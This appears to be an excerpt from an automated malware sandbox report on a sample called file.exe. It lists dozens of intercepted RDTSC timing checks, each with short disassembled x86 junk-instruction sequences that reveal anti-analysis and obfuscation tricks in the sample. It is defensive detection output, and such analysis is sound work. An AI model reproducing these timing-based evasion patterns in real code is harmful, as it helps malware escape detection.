                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18341 second address: B18348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18348 second address: B183AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0AD8C6A9B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jg 00007F0AD8C6A9BCh 0x0000002a push 00000004h 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D27B2h], edi 0x00000033 mov ax, di 0x00000036 popad 0x00000037 nop 0x00000038 jnp 00007F0AD8C6A9C8h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jnc 00007F0AD8C6A9B6h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18A45 second address: B18A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18A4A second address: B18A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18AC7 second address: B18ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18ACB second address: B18AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18AD1 second address: B18B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007F0AD95F882Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F0AD95F8826h 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0AD95F8828h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jg 00007F0AD95F882Ch 0x0000003c mov dword ptr [ebp+122D1B38h], ecx 0x00000042 lea eax, dword ptr [ebp+1247D54Ch] 0x00000048 mov edi, 5DFB78C1h 0x0000004d nop 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F0AD95F8826h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18B3D second address: B18B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18B53 second address: B18B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18B5A second address: B18BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0AD8C6A9B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov di, EE3Dh 0x00000027 or dword ptr [ebp+122D37E6h], esi 0x0000002d lea eax, dword ptr [ebp+1247D508h] 0x00000033 jbe 00007F0AD8C6A9B9h 0x00000039 mov cx, bx 0x0000003c mov edx, 3BB5A890h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 jmp 00007F0AD8C6A9C4h 0x0000004a pop edi 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18BBA second address: B18BBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B551E6 second address: B551EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55866 second address: B5587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A091 second address: B5A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F0AD8C6A9B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A0AB second address: B5A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A0AF second address: B5A0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A7DB second address: B5A7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AC6F second address: B5AC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5ADCD second address: B5ADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B092 second address: B5B0A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0AD8C6A9B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0AD8C6A9B6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60474 second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FFFA second address: B6000F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0AD8C6A9BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6000F second address: B60014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B654A5 second address: B654A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B654A9 second address: B654BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 js 00007F0AD95F8826h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B654BF second address: B654C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65648 second address: B65652 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65652 second address: B65658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65658 second address: B6565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6565C second address: B65667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B657CF second address: B657D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69F02 second address: B69F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69F06 second address: B69F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A251 second address: B6A25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6AF second address: B6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6B3 second address: B6A6BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6BD second address: B6A6E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push ebx 0x00000009 ja 00007F0AD95F8826h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0AD95F882Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A9BE second address: B6A9DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0AD8C6A9B6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E554 second address: B6E56E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0AD95F882Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DDDC second address: B6DE00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD8C6A9C3h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E242 second address: B6E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0AD95F882Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73851 second address: B73883 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD8C6A9C0h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD8C6A9C6h 0x00000010 ja 00007F0AD8C6A9B6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B739D1 second address: B739D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C83 second address: B73CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 jns 00007F0AD8C6A9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9C5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73CB6 second address: B73CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73CC5 second address: B73CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B745A5 second address: B745AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B745AF second address: B745B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74B96 second address: B74B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74B9B second address: B74BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD8C6A9C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74BB4 second address: B74BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0AD95F8832h 0x0000000b jns 00007F0AD95F8826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B753EA second address: B75406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD8C6A9C0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75406 second address: B7540D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7540D second address: B75456 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0AD8C6A9C9h 0x00000008 push ebx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0AD8C6A9D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0AD8C6A9BAh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75456 second address: B75460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B791B7 second address: B791BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79A6A second address: B79A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79D20 second address: B79D51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0AD8C6A9C2h 0x00000010 jmp 00007F0AD8C6A9BEh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84793 second address: B847AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F8833h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84A9B second address: B84AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F0AD8C6A9BAh 0x0000000b je 00007F0AD8C6A9BCh 0x00000011 js 00007F0AD8C6A9B6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0AD8C6A9BFh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84AC8 second address: B84AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0AD95F8826h 0x00000009 jne 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85459 second address: B8545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8545E second address: B85479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD95F8836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85479 second address: B8548D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F0AD8C6A9B8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8548D second address: B854CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD95F882Ah 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8837h 0x00000012 jmp 00007F0AD95F8834h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B854CB second address: B854D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BDF second address: B85BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BE3 second address: B85BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BE9 second address: B85BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BEF second address: B85BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BF3 second address: B85C2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0AD95F8834h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0AD95F8830h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85C2E second address: B85C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AB59 second address: B8AB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD95F8833h 0x0000000c jp 00007F0AD95F8826h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E9D3 second address: B8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD8C6A9C9h 0x00000008 jns 00007F0AD8C6A9B6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9BAh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE292C second address: AE2932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2932 second address: AE2937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2937 second address: AE296B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD95F8832h 0x00000008 jmp 00007F0AD95F8839h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E3DE second address: B8E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9BFh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E3F4 second address: B8E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0AD95F8826h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E403 second address: B8E444 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0AD8C6A9C9h 0x00000018 jmp 00007F0AD8C6A9C4h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E444 second address: B8E44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E44A second address: B8E44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9238B second address: B923A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jp 00007F0AD95F8826h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C830 second address: B9C834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C834 second address: B9C858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0AD95F882Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C858 second address: B9C85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C3DF second address: B9C3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C3E5 second address: B9C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C3EB second address: B9C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9FE85 second address: B9FE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9FE90 second address: B9FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0AD95F8834h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F9F7 second address: B9F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1525 second address: BB152B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB398E second address: BB3992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
